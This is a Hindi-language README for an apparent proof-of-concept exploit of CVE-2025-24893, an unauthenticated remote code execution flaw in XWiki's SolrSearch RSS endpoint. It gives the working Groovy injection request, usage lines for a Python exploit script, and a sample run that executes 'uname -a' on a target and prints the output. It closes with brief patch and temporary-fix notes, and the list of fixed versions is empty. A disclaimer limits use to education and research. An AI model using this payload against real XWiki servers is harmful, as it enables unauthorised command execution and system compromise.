
CVE-2025-24893 एक गंभीर अनधिकृत रिमोट कोड निष्पादन (RCE) भेद्यता है जो XWiki Platform को प्रभावित करती है।
यह दोष किसी भी अतिथि उपयोगकर्ता को SolrSearch एंडपॉइंट पर विशेष रूप से तैयार किए गए RSS अनुरोध के माध्यम से—बिना प्रमाणीकरण के—मनमाना Groovy कोड इंजेक्ट और निष्पादित करने की अनुमति देता है।
यह सीधे प्रभावित सिस्टम की गोपनीयता, अखंडता और उपलब्धता पर असर डालता है।
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H⚠️ अस्वीकरण:
यह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम पर अनधिकृत उपयोग कानून का उल्लंघन हो सकता है। लेखक इस टूल से जुड़े किसी भी दुरुपयोग या दुर्भावनापूर्ण गतिविधि के लिए ज़िम्मेदार नहीं है।
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
यह अनुभाग बताता है कि CVE-2025-24893 का लाभ उठाने के लिए Python एक्सप्लॉइट स्क्रिप्ट को कैसे सेट अप और चलाएं।
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
[+] Command output 'uname -a':
Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
भेद्यता को पैच करने के लिए, XWiki को निम्नलिखित संस्करणों में से किसी एक में अपडेट करें:
यदि तत्काल अपडेट संभव नहीं है, तो आप अस्थायी सुधार लागू कर सकते हैं:
SolrSearchMacros.xml फ़ाइल को संपादित करें (Main.SolrSearchMacros पर स्थित) लगभग पंक्ति 955 के आसपास।rawResponse मैक्रो का उपयोग करने के लिए बदलें, जिसमें कंटेंट प्रकार application/xml सेट हो।macros.vm में पंक्ति 2824 पर पाई जाने वाली कार्यान्वयन का उपयोग करें।संदर्भ: